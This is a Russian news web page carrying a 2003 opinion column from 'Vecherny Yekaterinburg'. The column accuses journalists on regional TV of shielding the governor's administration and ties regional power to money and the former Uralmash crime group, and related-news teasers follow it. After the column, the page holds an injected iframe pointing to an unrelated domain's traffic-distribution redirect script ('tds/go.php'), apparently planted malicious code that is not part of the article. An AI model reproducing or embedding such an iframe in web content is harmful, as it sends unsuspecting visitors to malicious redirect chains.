03.09.2003, 10:20

«Вечерний Екатеринбург»: Властная сила денег

Довелось посмотреть на официальном областном телеканале «дебаты» гражданина, называвшего себя журналистом, с другим гражданином, пребывающим ныне в качестве кандидата в губернаторы.
Насчёт «журналиста» вспомнился анекдот.
Потягивают виски два ковбоя. Один спрашивает: «Джек, а скажи мне, что такое диалектика?». Второй: «Ну слушай, Джон. Вот умрёшь ты. Вырастет на твоей могиле цветочек. Пройдёт корова, съест этот цветочек, уронит на могилу лепёху. Проеду я на мотоцикле. Посмотрю на эту лепёху и скажу: «Джон, ты совсем не изменился...».
Чтобы доказать, видимо, очевидное, кандидат в губернаторы даже оплатил эфир из своего избирательного фонда.
Но меня перепалка двух «ковбоев» в присутствии «секунданта» в лице гендиректора телеканала, мигом вставшего на сторону «Джона», навела на мысль определённого толка.
Отчего это журналисты, люди, казалось бы, долженствующие быть сами «четвёртой властью», вдруг с пеной у рта начинают защищать власть исполнительную? Причём не государственный строй от попыток его свергнуть; не политику власти от зловредных вражеских голосов — нет. На повышенных тонах, с криками «ату!» и оскорблениями по адресу оппонентов они пытаются оградить конкретных носителей власти от малейшей гражданской критики — почему?
Потому что сильна власть денег.
Эксперимент можно провести буквально в выходные. Скажем, возьмёт молодость верх над старостью, и куда деваться «журналистам» учреждённых либо патронируемых ею СМИ? На очередную панель?
Недавно мой коллега рассказал о судебном процессе, где юрист ответчика (одного из официальных СМИ) так обрисовал цели и задачи своего издания: защищать высшее должностное лицо! Ответ этот, уверен, войдёт в учебники для факультетов журналистики в качестве иллюстрации полной зависимости «журналистов» от власти.
Теперь рассмотрим: а так ли уж независима у нас сама власть?
Весной этого года в печати приводился своеобразный прейскурант «больших выборов». Так вот, чтобы сохранить (или занять) пост губернатора, необходимо потратить минимум 10 миллионов долларов! Это стоимость порядка полутысячи двухкомнатных квартир вовсе не на окраине Екатеринбурга — если кто не поленился пересчитать.
Где такие деньги? Понятно, у олигархов либо криминала. Ну так пока в нашем государстве!
Значит, опять не секрет: голосуем мы, в принципе, за деньги. За те или иные денежные мешки, представляют которые люди в бюллетенях. Конечно, есть мешки «чистые», есть «с душком», а бывают и просто «в натуре».
Помнится, высшее должностное лицо Среднего Урала произнесло фразу, где рассказывалось о приглашении к сотрудничеству «вора, бандита». Речь шла о бывшем ОПС «Уралмаш».
Не буду вдаваться в детали «дружбы» власти и сомнительного происхождения денег. Но когда я узнаю, что фирмы ОПС «Уралмаш» попали нынче в чёрный список милиции, то начинаю понимать и нервозность «журналистов», прикормленных этой властью.
Потому что сама власть — судя по всему, и не власть, а «передаточный механизм» для денег.
Мы уже знаем, что милиция на днях очень серьёзно взялась за «Город без наркотиков (ГБН), который, по некоторым источника» финансируется бывшим ОПС «Уралмаш». Изъяты документы, базы данных и проч. Руководители фонда вновь пытаются обелит себя на пресс-конференциях.
Сопоставьте факты. Выстройте цепочку.
Шум в «защиту» ГБН идёт в эфире телеканалов, финансируемых или спонсируемых областной властью. Как уже сказано, извести связи ГБН с бывшим ОПС «Уралмаш». Областная власть заявляла о своей, выразимся так, лояльности к ОПС «Уралмаш» и готовности финансово-экономическому сотрудничеству с ним. Руководит фондом «Город без наркотиков» советник губернатора Свердловской области. А «журналисты» в эфире официального телеканала рьяно ограждают действующую областную власть от критики. Комментарии излишни.
<iframe src="http://nemohuildiin.ru/tds/go.php

Похожие новости по теме
11.12.2003, 12:15

Бывшее ОПС «Уралмаш» может полностью захватить власть в Екатеринбурге

Над Екатеринбургом нависла угроза монополизации структурами близкими к самораспустившемуся ОПС «Уралмаш», - заявил политолог Сергей Мошкин. По его словам, на выборах главы Екатеринбурга впервые ...

04.11.2003, 11:23

Криминал рвется к власти * Андрей Франц: В Екатеринбурге к власти рвется криминал

«В Екатеринбурге идет попытка прорыва криминала во власть», - заявил ИА «Политсовет» политолог Андрей Франц. «Уже одно то, что структуры бывшего ОПС Уралмаш смогли создать фракцию в городской Думе -...

27.10.2003, 15:41

Чернецкий будет бороться с Хабаровым

«Представители бывшего ОПС «Уралмаш» будут продолжать борьбу за пост мэра Екатеринбурга» мэра», - считает политолог Сергей Мошкин. По его словам, между мэрией и бывшим ОПС «Уралмаш» сохраняется...

20.10.2003, 15:36

Хабаров выдвинулся от безысходности

«Выдвижение Александра Хабарова на пост мэра Екатеринбурга свидетельствует о том, что никаких иных возможностей повлиять на исполнительную власть Екатеринбурга у бывшего ОПС «Уралмаш» не осталось», -...

20.10.2003, 09:22

Националисты готовы договариваться с бывшим ОПС «Уралмаш»

Кандидат от националистов Сергей Пильщиков на пост мэра Екатеринбурга готов к сотрудничеству с бывшим ОПС «Уралмаш». «Мы готовы вести переговоры со всеми предпринимателями, чиновниками и в том числе...


Мастрид
Погода на неделю
Популярные новости
Новости по дням
Новости по месяцам